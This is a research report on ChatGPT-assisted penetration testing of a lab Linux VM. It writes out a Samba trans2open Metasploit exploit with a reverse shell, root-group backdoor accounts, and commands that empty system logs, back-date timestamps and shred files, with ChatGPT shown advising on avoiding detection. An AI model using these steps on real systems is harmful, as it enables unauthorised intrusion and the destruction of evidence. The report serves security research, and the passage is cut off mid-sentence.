AI-Enhanced Ethical Hacking: A Linux-Focused Experiment

Haitham S. Al-Sinani and Chris J. Mitchell


¹ Department of Cybersecurity and Quality Control, Diwan of Royal Court, Muscat,
Oman. [email protected]
² Department of Information Security, Royal Holloway, University of London,
Egham, Surrey. TW20 0EX, UK. [email protected]

arXiv:2410.05105v1 [cs.CR] 7 Oct 2024

Abstract. This technical report investigates the integration of generative
AI (GenAI), specifically ChatGPT, into the practice of ethical
hacking through a comprehensive experimental study and conceptual
analysis. Conducted in a controlled virtual environment, the study eval-
uates GenAI’s effectiveness across the key stages of penetration testing on
Linux-based target machines operating within a virtual local area net-
work (LAN), including reconnaissance, scanning and enumeration, gain-
ing access, maintaining access, and covering tracks. The findings confirm
that GenAI can significantly enhance and streamline the ethical hacking
process while underscoring the importance of balanced human-AI col-
laboration rather than the complete replacement of human input. The
report also critically examines potential risks such as misuse, data biases,
hallucination, and over-reliance on AI. This research contributes to the
ongoing discussion on the ethical use of AI in cybersecurity and high-
lights the need for continued innovation to strengthen security defences.

Keywords: AI · Ethical Hacking · GenAI · ChatGPT · Cybersecurity.

1 Introduction

Ethical hacking [14] is a crucial aspect of modern cybersecurity, yet it remains a
highly time-consuming and resource-intensive endeavour. It requires not only advanced
expertise but also continuous knowledge updates to stay ahead of rapidly
evolving threats. Traditional ethical hacking approaches demand significant hu-
man involvement at each phase, from reconnaissance to vulnerability scanning
and exploitation, which increases both the time and overall costs involved.
Additionally, the process relies heavily on skilled professionals to effectively
identify and exploit vulnerabilities, making it challenging to keep up with the
growing scale and sophistication of attacks. These efforts are further constrained
by the limited capacity of human operators to manage complex or large-scale
environments without substantial investments in training and resources.
The integration of AI technologies, particularly GenAI, offers a promising
solution to the challenges faced in ethical hacking by automating and enhancing
various stages of the process. Tools like ChatGPT³ [5] allow ethical hackers
to streamline repetitive tasks, make faster decisions, and reduce the extensive
human input typically required. This not only addresses the time and capacity
limitations faced by operators but also lowers the implementation costs. GenAI’s
ability to analyse data, provide real-time insights, and optimise workflows leads
to more efficient, cost-effective security assessments.
This report presents a comprehensive experimental study evaluating the prac-
tical use of GenAI in a controlled Linux-based virtual environment. By simu-
lating key stages of ethical hacking, such as reconnaissance, scanning, gaining
& maintaining access, and covering tracks, this study demonstrates how GenAI
can enhance these processes and bolster cybersecurity defences. The findings
and observations documented here contribute to the ongoing discussion about
AI-human collaboration in cybersecurity, emphasising the potential of GenAI
to improve efficiency and reduce costs while maintaining the need for expert
oversight.
While previous research has explored the broader role of GenAI in cyberse-
curity, this report specifically examines its application in Linux-based environ-
ments, which are frequently targeted in both penetration testing and real-world
attacks. This work builds on our previously published research, in which we
proposed a conceptual model leveraging the capabilities of GenAI to support
ethical hackers across the five stages of ethical hacking [3]. It also expands on a
proof-of-concept implementation, used to conduct an initial experimental study
on the integration of AI into ethical hacking on target Windows VMs [2].
The remainder of this document is organised as follows. Section 2 explores
GenAI and ChatGPT. Section 3 presents the laboratory setup, and Section 4
outlines our methodology. Section 5 details the execution of our experiment.
Section 6 discusses the potential benefits and risks. Section 7 reviews related
work, and Section 8 summarises our conclusions and outlines plans for future
work. Finally, Appendix A lists all the figures referenced in this technical report.

2 Generative AI and ChatGPT


The advent of GenAI, with models like ChatGPT⁴ [5] prominent among them, represents a
major shift in the AI landscape. These systems, moving beyond the traditional
AI focus on pattern recognition and decision-making, excel in content creation,
including text, images, and code. The ability to learn from extensive datasets
and produce outputs that mimic human creativity is a major advance.
Central to this revolution is the GPT (Generative Pre-trained Transformer)
architecture, the basis of models like ChatGPT. Developed by OpenAI, GPT
models are built on deep learning techniques using transformer models, designed
specifically for handling sequential data. These models undergo pre-training,
where they learn from a wide range of sources, including Internet text,
followed by fine-tuning for specific tasks. This process enables models to grasp
not just the structure of language but also its context, essential for generating
human-like text.

³ https://openai.com/blog/chatgpt
⁴ https://openai.com/blog/chatgpt

Each iteration of ChatGPT has demonstrated enhanced contextual under-
standing and output relevance. Its primary function lies in interpreting user
prompts and generating coherent, contextually appropriate responses. This ver-
satility extends from conducting conversations to performing complex tasks, in-
cluding coding, content creation, and, as we propose in this report, ethical hack-
ing. The GPT model family, including ChatGPT, owes much of its success to the
transformer model, introduced by Vaswani et al. in 2017 [15]. This architecture
revolutionises sequence processing through attention mechanisms, enabling the
model to focus on different parts of the input based on its relevance to the task.
The latest iteration at the time of writing, GPT-4o⁵, provides significant advances in speed,
multimodal capabilities, and overall intelligence. GPT-4o, now available to a broader
user base, including free-tier users, improves upon the GPT-4 model by offering
enhanced performance in understanding and generating text, as well as new ca-
pabilities in processing voice and images. These improvements position GPT-4o
as a powerful tool not only in natural language processing but also in applica-
tions such as real-time communication and data analysis, making it a key asset
in modern cybersecurity practices.
In exploring the intersection of AI and cybersecurity, understanding Chat-
GPT’s foundational aspects is vital. Its generative nature, contextual sensitivity,
and adaptive learning capacity can lead to innovative approaches in cybersecu-
rity practices. Our focus will be on how these qualities of ChatGPT can be
used to support ethical hacking, exploring the technical, ethical, and practical
implications.

3 Laboratory Setup

3.1 Physical Host and Virtual Environment Configuration

The experiments used a MacBook Pro with 16 GB RAM, a 2.8 GHz Quad-Core
Intel Core i7 processor, and 1 TB of storage, providing sufficient computational
capabilities for virtualisation (see Figs. 1 and 2).
Virtualisation of the network was achieved using VirtualBox 7 (see Fig. 3),
a reliable tool for creating and managing virtual machine environments. The
virtual setup included the following VMs.

1. Kali Linux VM: this machine functioned as the primary attack platform
for conducting the penetration tests. It is equipped with the necessary tools
and applications for ethical hacking.
2. Windows VM: this machine, running a 64-bit version of Windows Vista
with a memory allocation of 512 MB, was the principal target for penetration
testing within a previously conducted experiment [2].
3. Linux VM: this machine, operating on a 64-bit Linux Debian system and
allocated 512 MB of memory, is the primary focus of this report.

⁵ https://openai.com/blog/chatgpt

The network configuration was established in a local NAT (Network Address
Translation) setup, allowing for seamless communication between the VMs and
simulating a realistic network environment suitable for penetration testing.

3.2 Generative AI Tool

The experiment leveraged ChatGPT-4⁶ (a paid version) for its advanced AI capabilities
and efficient response time. The selection of ChatGPT-4 was also based
on its prominent status as a leading GenAI tool, offering cutting-edge technology
to enhance the ethical hacking process. Of course, other GenAI tools are also
available, e.g. Google’s Bard⁷ and GitHub Copilot⁸, which could potentially
be used in similar contexts. The methodologies and processes described are ap-
plicable to both the paid and free versions of ChatGPT, with the paid version
chosen for improved performance in this study.

4 Methodology

The experiment followed the structured phases of ethical hacking listed below,
with ChatGPT’s guidance integrated at each step.

1. Reconnaissance: ChatGPT was used to gather and analyse information
about the target VMs, including scanning to discover live machines.
2. Scanning and Enumeration: Network and vulnerability scanning were
conducted using tools such as nmap, with ChatGPT helping to interpret the
scan results and identify potential vulnerabilities.
3. Gaining Access (Linux VM): This phase focused on exploiting identi-
fied vulnerabilities using the Metasploit framework. ChatGPT assisted in
selecting and configuring the appropriate exploit.
4. Maintaining & Elevating Access: ChatGPT suggested methods for
maintaining access, such as creating backdoor accounts and escalating priv-
ileges within the compromised system.
5. Covering Tracks & Documentation: In the post-exploitation phase,
ChatGPT advised on strategies to effectively erase traces of the penetration
test, thereby reducing the likelihood of detection by system administrators.
This included log manipulation and account removal. Additionally, Chat-
GPT assisted in documenting the ethical hacking process, ensuring com-
prehensive reporting of methodologies, findings, and recommendations for
enhancing system security.
⁶ https://openai.com/index/hello-gpt-4o/
⁷ https://bard.google.com/
⁸ https://github.com/features/copilot/

We initiated the experiment by asking ChatGPT to provide a concise explanation
of the five ethical hacking stages, along with a list of commonly used
Kali commands for each stage. ChatGPT provided an informative response, as
illustrated in Fig. 4.

5 Execution
We now summarise the experimental procedure for each stage.

5.1 Reconnaissance
There are two main types of reconnaissance (recon).
1. Passive Recon: This entails gathering information about the target without
interacting with it directly.
2. Active Recon: This involves interacting with the target directly, e.g. by
probing it, and observing its responses.
The emphasis here is on active reconnaissance; we followed the steps listed
below.

Notes on VM IP Address. First, observe that in our VirtualBox-driven,
NAT-based VM environment, the DHCP server is configured by default to
dynamically assign IP addresses to the VMs. DHCP typically allocates IP
addresses sequentially within the specified range. For instance, if the range is
192.168.1.0/24 (see Fig. 6 below), the first IP address assigned would likely be
192.168.1.1 (often reserved for the default gateway), followed by 192.168.1.2, and
so on. However, IP addresses may change between device sessions. The availabil-
ity of a specific IP address depends on several factors, including the DHCP lease
time and the currently active VMs. To maintain consistency in the experiment,
and because the originally assigned dynamic IP address for the Linux VM men-
tioned earlier (192.168.1.7) had changed, we opted to assign a static IP address,
reverting it to 192.168.1.7, as shown in Fig. 7 below. While this approach does
not scale well for large, enterprise-level networks, it is practical in our controlled
research environment.
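
As an illustration only (not part of the original experiment), the address arithmetic described above can be sketched with Python's standard `ipaddress` module. The helper name `describe_range` is hypothetical; the range and the static address are those quoted in the text.

```python
import ipaddress

# The range quoted in the text (see Fig. 6).
network = ipaddress.ip_network("192.168.1.0/24")


def describe_range(net):
    """Return (first host, last host, number of usable hosts) for a network."""
    # hosts() skips the network address (.0) and the broadcast address (.255).
    usable = list(net.hosts())
    return str(usable[0]), str(usable[-1]), len(usable)


first, last, count = describe_range(network)
print(f"usable hosts: {first} .. {last} ({count} addresses)")

# The static address chosen for the Linux VM must lie inside the range.
linux_vm = ipaddress.ip_address("192.168.1.7")
print(f"{linux_vm} in {network}: {linux_vm in network}")
```

Whether the first usable address is actually held by the gateway depends on the VirtualBox network settings, so the sketch makes no claim about which address a given VM receives.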
1. Since we are starting a new ChatGPT session, we first inform ChatGPT
about our VM setup (see Fig. 5).
2. As an integral part of the initial reconnaissance phase, the aim is to identify
active machines within the target network in order to select a target. To
achieve this, we posed the following question to ChatGPT: “I’m currently
in the initial stage of ethical hacking, known as ‘reconnaissance’. Could you
please provide a list of the top 4 commands I can use on my Kali machine to
find out which devices are currently active on my local network?”. As shown
in Fig. 8, ChatGPT responded with a useful compilation of potential Kali
terminal commands, including nmap, netdiscover, and arp-scan, along with
examples of their use.
3. We next turned to the Kali ‘attack’ machine, applying the ChatGPT
recommendations. As a result, we successfully identified the active devices
within the target network, as in Fig. 9.
4. To determine the IP address of the Kali ‘attack’ machine, we used the ‘host-
name’ command with the ‘-I’ option, as shown in Fig. 10.
5. To find potential target machines, the IP addresses of the Kali host, the
standard default gateway, and the DHCP server can be excluded. To sim-
plify this process and avoid the need to remember the relevant commands,
ChatGPT can be consulted for guidance. We first asked ChatGPT for the
commands to display the IP addresses of our Kali machine, the standard
default gateway, and the DHCP server, as shown in Fig. 11. We executed
these commands, as displayed in Fig. 12. We next asked ChatGPT to analyse
the output from the ‘arp-scan’ command, which lists active network nodes,
together with the output of the commands displaying these IP addresses, in order to
identify the role of each IP address, such as Kali machine, DHCP server,
etc. ChatGPT performed this analysis and provided responses in a question-and-answer
format, as shown in Figs. 13 and 14.
6. As a result of the analysis presented above, we identified the VMs with the
IP addresses 192.168.1.6 and 192.168.1.7 as potential targets. This allowed
us to proceed to the second stage, scanning.
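
The exclusion logic in steps 5 and 6 amounts to a set difference, which the following minimal Python sketch illustrates. Only the addresses 192.168.1.4 (Kali), 192.168.1.6 and 192.168.1.7 come from the text; the gateway and DHCP server addresses, and the function name `candidate_targets`, are assumptions made purely for illustration.

```python
import ipaddress


def candidate_targets(live_hosts, excluded):
    """Return live hosts that are not in the excluded set, sorted numerically."""
    remaining = set(live_hosts) - set(excluded)
    return sorted(remaining, key=ipaddress.ip_address)


# Hypothetical list of live hosts, as a discovery scan might report them.
live = ["192.168.1.1", "192.168.1.3", "192.168.1.4", "192.168.1.6", "192.168.1.7"]

# Addresses to exclude. The first two roles are assumed, not taken from the report.
infrastructure = {
    "192.168.1.1": "default gateway (assumed)",
    "192.168.1.3": "DHCP server (assumed)",
    "192.168.1.4": "Kali attack machine",
}

targets = candidate_targets(live, infrastructure)
print(targets)
```

Sorting by `ipaddress.ip_address` rather than by string avoids the usual pitfall where "192.168.1.10" would sort before "192.168.1.6".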

5.2 Scanning

During this stage, ethical hackers typically use automated tools to scan a target
system or network for vulnerabilities. This can include port scanning, vulnerability
scanning, etc. In our scenario, the system to be scanned is the Linux
machine with IP address ‘192.168.1.7’.
To initiate this phase, we asked ChatGPT for key commands for gather-
ing comprehensive information about the specific target (192.168.1.7) using our
Kali machine. We informed ChatGPT that the goal was to gather extensive
intelligence on this system in preparation for an attack. As shown in Fig. 15,
ChatGPT provided a concise list of potential scanning commands, including the
use of nmap and its various capabilities. Interestingly, this output is significantly
more comprehensive than that which ChatGPT produced a year previously when
we asked a similar question for a different VM (Windows) [2], demonstrating the
model’s improvement over time.
We further engaged with ChatGPT, requesting a single ‘nmap’ command
that could gather as much information as possible about the target (192.168.1.7),
including scanning all ports and saving the output in all supported ‘nmap’ formats.
ChatGPT correctly recommended the command ‘nmap -p- -A -T4 -oA
scan_results 192.168.1.7’, providing a detailed breakdown of the command’s options,
as illustrated in Fig. 16. The options in this ‘nmap’ command have the
following effects:

– -p-: scans all 65,535 TCP ports;
– -A: enables OS detection, version detection, script scanning, and traceroute;
– -T4: sets the timing template to ‘Aggressive’ for faster scanning; and
– -oA scan_results: saves the output in all three major ‘nmap’ formats
(.nmap, .xml, and .gnmap) with the base name ‘scan_results’.
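
To make the effect of the `-oA` option concrete, the short Python sketch below tokenises the command and derives the three output file names. It does not run `nmap`; the base name is taken to be `scan_results` (with an underscore), and the helper `output_files` is a hypothetical name introduced for this illustration.

```python
import shlex

COMMAND = "nmap -p- -A -T4 -oA scan_results 192.168.1.7"


def output_files(command):
    """Return the file names that '-oA <basename>' asks nmap to write."""
    args = shlex.split(command)
    # The argument following -oA is the base name shared by all three files.
    base = args[args.index("-oA") + 1]
    return [f"{base}.{ext}" for ext in ("nmap", "xml", "gnmap")]


print(shlex.split(COMMAND))
print(output_files(COMMAND))
```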

We then executed the ChatGPT-suggested command ‘nmap -p- -A -T4
-oA scan_results 192.168.1.7’ to perform a comprehensive scan of the target
machine. The ‘nmap’ scan results, clearly identifying the Linux target VM, are
presented in Fig. 17. We then asked ChatGPT to analyse these results and
provide suggestions for potential unauthorised access routes, preparatory for the
next phase in which we attempt to gain access.
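
Scan results saved in XML form can also be summarised programmatically before being passed to a human or an AI assistant for interpretation. The following is a minimal sketch under stated assumptions: the XML fragment is a hand-written, heavily simplified stand-in for real `nmap` output (it is not the output shown in Fig. 17), and `open_ports` is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET

# Hand-written sample in the general shape of nmap's XML output (illustrative only).
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="192.168.1.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>"""


def open_ports(xml_text):
    """Return [(address, port, service)] for every port whose state is 'open'."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        address = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name") if service is not None else "unknown"
            found.append((address, int(port.get("portid")), name))
    return found


for address, port, name in open_ports(SAMPLE_XML):
    print(f"{address}:{port} {name}")
```

A compact summary of this kind is easier to review, and to paste into a prompt, than the full scan log.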

5.3 Gaining Access

In this phase, we sought guidance from ChatGPT to gain access to the Linux VM
with the IP address ‘192.168.1.7’ using our Kali attack machine. To streamline
the process, we decided to exploit an SMB-related vulnerability via Metasploit.
The ‘nmap’ scan revealed that the target machine supports SMB version 2,
which is outdated and known to have vulnerabilities. ChatGPT provided a de-
tailed guide on how to use Metasploit to confirm the SMB version, as shown in
Fig. 18, which we followed. We started Metasploit with the command ‘msfconsole’,
selected the ‘auxiliary/scanner/smb/smb_version’ module, set the target
IP with ‘set RHOSTS 192.168.1.7’, and executed the module with ‘run’. The
Metasploit output confirmed the ‘nmap’ results, indicating that our target in-
deed supports SMB version 2, as shown in Fig. 19.
Following this confirmation, we asked ChatGPT which exploit available in
Metasploit could be used to gain access. As shown in Figs. 20
and 21, ChatGPT recommended the use of the “Samba ‘trans2open’ overflow”
exploit in Metasploit, which is specifically designed to target older versions of
Samba, such as 2.2.1a. ChatGPT also provided step-by-step instructions on how
to exploit this vulnerability using Metasploit.
As shown in Fig. 22, we followed ChatGPT’s instructions to exploit the well-
known trans2open vulnerability. However, when we attempted to run the exploit,
we encountered an error since the payload suggested by ChatGPT was incom-
patible. This demonstrates that, while ChatGPT is a powerful tool, it is not
infallible and can make mistakes. We presented the error directly to ChatGPT
without specifically requesting a solution, and ChatGPT promptly suggested a
fix (see Fig. 24). We applied the suggested fix, as shown in Fig. 23, and successfully
gained root access to the target Linux machine (see Fig. 25).
To summarise, in order to gain access to the target machine (192.168.1.7) using
the ‘trans2open’ exploit via Metasploit, we started Metasploit with ‘msfconsole’,
selected the exploit module with ‘use exploit/linux/samba/trans2open’, set
the payload with ‘set payload linux/x86/shell/reverse_tcp’, configured the target
IP with ‘set RHOSTS 192.168.1.7’, set the ‘LHOST’ to the attacking machine’s
IP (192.168.1.4), accepted the default ‘LPORT’ of 4444, and then ran the exploit
with ‘run’.
5.4 Maintaining Access


In this phase, the objective is to ensure we can re-enter the target system in
future, ideally without being detected. Typically, achieving persistent access requires
elevated privileges, often in the form of administrator or root access.
Where such privileges are lacking, ChatGPT could be asked to assist in elevating
the access level. In our case this was unnecessary: in the previous stage, we
successfully exploited the ‘trans2open’ vulnerability, which granted root access
(see Fig. 25), the highest possible level of access.
However, as we only obtained a basic, limited shell in the previous step, we
first needed to stabilise and potentially upgrade this shell. In response to our re-
quest, ChatGPT provided a brief guide (see Fig. 26) for using the bash terminal
in interactive mode by running the command ‘/bin/bash -i’ (see Fig. 27).
Additionally, ChatGPT advised on upgrading the current shell to the more powerful
‘meterpreter’ using Metasploit. The recommended steps are: in Metasploit, use
post/multi/manage/shell_to_meterpreter, set SESSION <session id>, and
execute the module with ‘run’ to upgrade the shell. Despite following these
steps, the newly created meterpreter session terminated (see Fig. 28). Although
ChatGPT provided several potential solutions, we were unable to resolve the
issue and will address it in future work.
With this in mind, we next consulted ChatGPT for guidance on maintaining
persistent access. In response to the query shown in Fig. 29, ChatGPT provided
a list of recommendations for establishing persistent access (see Fig. 30). These
recommendations include creating a new root user for alternative access, setting
up a persistent reverse shell, installing an SSH key for password-less access,
establishing a cron job for regular reverse shell connections, and backing up
important files. We next attempted to implement two of these approaches, as
outlined below.

Creating a New User. As shown in Fig. 31, we first created a new root
user employing the command ‘useradd -m -s /bin/bash -G root Haitham’.
This command creates a new user named ‘Haitham’, sets up a home directory
at /home/Haitham with the -m option, assigns /bin/bash as the default shell
with the -s option, and includes the user in the root group with the -G op-
tion, thereby granting elevated permissions (see Fig. 35). We further used the
command ‘passwd Haitham’ to set up a new password for the newly added
user (see Fig. 33 and Fig. 34). We verified that the user was indeed added by
checking for a new entry in both the /etc/passwd and /etc/shadow files. We
also confirmed that the user was added to the root group using the command
‘groups Haitham’, and by reviewing the /etc/sudoers file (see Fig. 36).
Subsequently, we tested this by restarting the Linux target machine and success-
fully confirmed our ability to log in using the newly created user through the
standard Linux login procedure.
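
The verification step above can be illustrated by parsing entries in the standard colon-separated formats of /etc/passwd and /etc/group. The sample lines below are hypothetical (in particular, the UID and GID of 1001 are assumed, not taken from the figures), as are the helper names. The sketch also makes one distinction explicit: membership of the root group is not the same as holding UID 0.

```python
def parse_passwd_line(line):
    """Split an /etc/passwd entry: name:password:UID:GID:GECOS:home:shell."""
    name, _pw, uid, gid, _gecos, home, shell = line.strip().split(":")
    return {"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell}


def group_members(line):
    """Split an /etc/group entry: name:password:GID:comma-separated members."""
    name, _pw, _gid, members = line.strip().split(":")
    return name, [m for m in members.split(",") if m]


# Hypothetical entries of the kind 'useradd -m -s /bin/bash -G root Haitham' would produce.
PASSWD_LINE = "Haitham:x:1001:1001::/home/Haitham:/bin/bash"
GROUP_LINE = "root:x:0:Haitham"

user = parse_passwd_line(PASSWD_LINE)
group, members = group_members(GROUP_LINE)

print(user["home"], user["shell"])
print(f"{user['name']} in group {group}: {user['name'] in members}")
print("UID 0 (the root account itself):", user["uid"] == 0)
```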
Since port 22 is open, we established an SSH session using the newly added
user credentials (see Fig. 37), which provided a more stable shell with double-tab
auto-completion and history features enabled by default. This SSH session can
be established even after reboots, as long as the target machine (192.168.1.7)
remains operational.

Enabling SSH Password-less Access. To further evaluate ChatGPT’s capabilities,
we requested a step-by-step guide for enabling password-less SSH public-key
authentication from our Kali machine (192.168.1.4) to the Linux target
(192.168.1.7). While ChatGPT’s initial response was useful, it was not entirely
accurate. After a series of interactions, we managed to prompt ChatGPT to add
the missing steps and provide a more precise explanation (see Figs. 38 to 40).
This reinforces the conclusion that relying on human-AI collaboration is crucial,
rather than solely depending on AI to replace human input.
In summary, to enable password-less SSH access, we performed the following
steps.

1. We first generated an SSH key pair on the Kali machine using ‘ssh-keygen
-t rsa -b 4096’.
2. We next copied the public key to the target machine by executing the com-
mand ‘ssh-copy-id [email protected]’ on our Kali machine.
3. We enabled SSH public-key, password-less authentication on the target machine
by adding ‘PubkeyAuthentication yes’ to the ‘/etc/ssh/sshd_config’
file, and then restarted the SSH service with ‘sudo systemctl restart
sshd’.
4. We also ensured correct file permissions on the target machine with the commands:
‘chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys’.
5. Finally, we tested the connection from the Kali machine using the command:
‘ssh [email protected]’.
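
The permission step matters because OpenSSH, with its default StrictModes setting, may refuse key-based logins when the key files or directories are too widely accessible. The following minimal Python sketch checks for the 700/600 modes used above. It assumes a POSIX system and works on a throwaway temporary directory rather than a real ~/.ssh; the helper names are hypothetical.

```python
import os
import stat
import tempfile


def mode_of(path):
    """Return the permission bits of path, e.g. 0o700."""
    return stat.S_IMODE(os.stat(path).st_mode)


def ssh_permissions_ok(ssh_dir):
    """True if ssh_dir is 700 and its authorized_keys file is 600."""
    keys = os.path.join(ssh_dir, "authorized_keys")
    return mode_of(ssh_dir) == 0o700 and mode_of(keys) == 0o600


with tempfile.TemporaryDirectory() as tmp:
    ssh_dir = os.path.join(tmp, ".ssh")
    os.mkdir(ssh_dir)
    keys = os.path.join(ssh_dir, "authorized_keys")
    open(keys, "w").close()

    os.chmod(ssh_dir, 0o755)  # deliberately too permissive
    os.chmod(keys, 0o644)
    before = ssh_permissions_ok(ssh_dir)

    os.chmod(ssh_dir, 0o700)  # equivalent of: chmod 700 ~/.ssh
    os.chmod(keys, 0o600)     # equivalent of: chmod 600 ~/.ssh/authorized_keys
    after = ssh_permissions_ok(ssh_dir)

print("before:", before, "after:", after)
```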

5.5 Covering Tracks and Documentation

This (final) ethical hacking phase has two main components:

1. covering our tracks, which involves erasing or minimising evidence of our
activities within the target system, crucial to avoid detection and maintain
the system as close to its original state as possible; and
2. documentation, involving creating the pen-test report, a topic discussed
later.

Covering Tracks. First, aiming to remain undetected, we asked ChatGPT for
guidance. As shown in Figs. 41 and 42, ChatGPT provided a list of actions,
including the following.

– Clear Command History: Clear the current session’s history and remove
the history file using ‘history -c && history -w’ and ‘rm ~/.bash_history’.
– Disable Future History Logging: Disable history logging for the session
with ‘unset HISTFILE’, ‘export HISTSIZE=0’, and ‘export HISTFILESIZE=0’.
– Remove Log Entries: Empty critical log files without deleting them using
‘echo > /var/log/auth.log’, ‘echo > /var/log/syslog’, and ‘echo >
/var/log/secure’.
– Clean SSH Artifacts: Remove the SSH key and check SSH logs for the
hacking activities using ‘rm ~/.ssh/authorized_keys’ and ‘sudo nano
/var/log/auth.log’.
– Delete Temporary Files: Remove temporary files that could reveal the
pen-test activities using ‘rm -rf /tmp/*’ and ‘rm -rf /var/tmp/*’.
– Remove ‘Haitham’ User: Delete the ‘Haitham’ user and the correspond-
ing home directory using ‘userdel -r Haitham’.
– Clear Scheduled Tasks: Remove all cron jobs for the current user with
‘crontab -r’.
– Flush ARP Cache: Clear the ARP cache to remove traces in the network
using ‘ip -s -s neigh flush all’.
– Reset Terminal and Exit: Clear the terminal screen and exit the shell
cleanly using ‘reset’ and ‘exit’.

Underscoring the significance of AI-human collaboration, we observed that
ChatGPT omitted certain additional crucial steps for covering tracks, specifically
updating timestamps and using the shred command. We therefore consulted
ChatGPT about these two commands, as outlined below.

Updating Timestamps for Track Covering. In response to a query (see
Figs. 43 and 44), ChatGPT outlined the process for modifying file timestamps
to cover tracks. This involves using ‘stat filename’ to display the current
access, modification, and change times. One can then update these timestamps
as follows:
– set both access and modification times to a specific date and time with
‘touch -t YYYYMMDDHHMM filename’;
– modify only the access time with ‘touch -a -t YYYYMMDDHHMM filename’;
– adjust only the modification time with ‘touch -m -t YYYYMMDDHHMM filename’;
or
– align the timestamps of a file with those of another file using ‘touch -r
reference_file target_file’.
Finally, verify the changes using ‘stat filename’.
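
One point worth noting from a defender's perspective is that `touch` sets the access and modification times but not the change time (ctime), which the kernel updates whenever the file's metadata is altered. The minimal Python sketch below, which assumes a POSIX system and uses a temporary file, back-dates a file's access and modification times with `os.utime` (the counterpart of `touch -t`) and shows that the ctime still reflects the moment of tampering. The helper name `backdate` is hypothetical.

```python
import os
import tempfile
import time


def backdate(path, when):
    """Set access and modification times to 'when' (epoch seconds), like touch -t."""
    os.utime(path, (when, when))


with tempfile.NamedTemporaryFile(delete=False) as handle:
    path = handle.name

one_year_ago = time.time() - 365 * 24 * 3600
backdate(path, one_year_ago)
info = os.stat(path)
os.remove(path)

# mtime now lies in the past, but ctime records when the metadata was last
# changed, i.e. the moment backdate() ran.
ctime_is_later = info.st_ctime > info.st_mtime
print("mtime:", time.ctime(info.st_mtime))
print("ctime:", time.ctime(info.st_ctime))
print("ctime later than mtime:", ctime_is_later)
```

A modification time that is much older than the change time is therefore one indicator an investigator might look for when reviewing `stat` output.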

Using shred for Secure File Deletion. In response to our question (see
Figs. 45 and 46), ChatGPT explained that shred is a command-line utility in
Linux used to securely delete files by overwriting their contents with random
data multiple times, making it extremely difficult to recover the original data.
The command ‘shred -uvfz -n 5 old_authorized_keys’ operates as follows:

– -u: unlinks (deletes) the file after shredding;
– -v: displays verbose progress of the shredding operation;
– -f: forces shredding of files even if they are read-only;
– -z: adds a final overwrite with zeros to obscure the fact that the file was
shredded; and
– -n 5: specifies that the file should be overwritten 5 times with random data.

In this example, the command securely deletes the file old_authorized_keys
by overwriting it five times with random data, adding a final overwrite with
zeros, showing progress, forcing the operation even if the file is read-only, and
then deleting the file.
Finally, while we implemented some of these recommendations, it is worth
noting ChatGPT’s advice that clearing logs can raise suspicion in real-world
scenarios and might not always be advisable.

Documentation. Ethical hackers need to produce a comprehensive
report for each penetration testing assignment. To ensure
the quality and completeness of our report, we enlisted ChatGPT’s assistance
in composing a detailed report for our penetration testing (simulation)
assignment using the information already present in this paper.
As shown in Figs. 47 and 48, we first asked ChatGPT about the key sections
of a standard penetration testing report. ChatGPT provided a template that
we could use to structure our report, along with guidance on what to include
in each section. Following this, we asked ChatGPT to draft a standard penetration
testing report based on this research paper, simply copying
and pasting all the relevant sections into the ChatGPT prompt (see Fig. 49). We
instructed ChatGPT to ensure that all key sections were included and to sim-
ulate a real-world penetration testing assignment as closely as possible, rather
than presenting it merely as a research exercise. ChatGPT responded with a
well-written and accurate penetration test report, including sections such as
the ‘Executive Summary,’ ‘Introduction,’ ‘Methodology,’ ‘Findings and Results,’
‘Attack Narrative,’ and ‘Conclusions and Recommendations,’ along with sug-
gestions for ‘Appendices.’ In subsequent interactions with ChatGPT, we further
refined and enhanced the report, adding details such as the author of the pen-
test, the time period, and the date (see Figs. 50 to 53).
In summary, this report presents the findings and results of a penetration
testing assignment aimed at evaluating the security of a Linux VM operating
as a node within a virtual LAN environment. The test uncovered a critical vul-
nerability in the outdated SMB service, which was exploited to gain root access
to the system. Persistent access was established by creating a new root user
and enabling password-less SSH authentication, while evidence of the penetra-
tion test was effectively covered. The report, titled Penetration Test Report for
Linux-Based Systems, includes key sections such as Scope, Methodology, Find-
ings, Risk Analysis, and Recommendations, and recommends immediate updates
to the SMB service, hardening SSH configurations, and ongoing vulnerability as-
sessments to strengthen the system’s security posture.
6 Discussion: Benefits and Risks


Ethical hacking, a critical component of comprehensive security strategies, is a
promising arena for the application of advanced AI systems like ChatGPT. Using
the generative and language-understanding capabilities of ChatGPT, we can envision a
paradigm shift in how security assessments and penetration tests are conducted.
ChatGPT’s potential in automating the scripting and execution of sophisti-
cated penetration tests is very significant. The model’s capacity to write code
enables it to generate custom scripts tailored to specific environments or sce-
narios. It could potentially analyse a target system’s architecture and suggest
relevant tests, thereby streamlining the reconnaissance phase of ethical hacking.
Beyond scripting, the interactive nature of ChatGPT makes it an ideal as-
sistant for real-time problem-solving during penetration testing. Ethical hackers
can consult the model for troubleshooting, brainstorming exploitation strategies,
or even learning about novel vulnerabilities and techniques on the fly.
Its vast knowledge base can act as an immediate reference for the latest Common
Vulnerabilities and Exposures (CVEs) and mitigation strategies.
The adaptability of ChatGPT also suggests a role in social engineering simu-
lations. It could craft credible phishing emails, create dialogue for vishing (voice
phishing), or assist in developing pretext scenarios for physical security breaches.
This would enable organisations to better train their staff against a variety of
social engineering attacks.
From a defensive standpoint, ChatGPT can be used to simulate an attacker’s
mindset and tactics. It can help in generating hypothetical attack scenarios,
thereby allowing security teams to better prepare and defend against potential
breaches. Moreover, the AI’s capability to interpret a wide range of data could
be pivotal in anomaly detection, effectively identifying unusual patterns that
may signify a security threat.
However, when integrating AI, particularly ChatGPT, into ethical hacking,
a thorough examination of ethical considerations is essential. Using AI in cyber-
security aids efficiency and effectiveness but also raises serious concerns around
data privacy, informed consent, and potential misuse. The reliance on advanced
AI systems like ChatGPT poses risks, such as the unintentional discovery and ex-
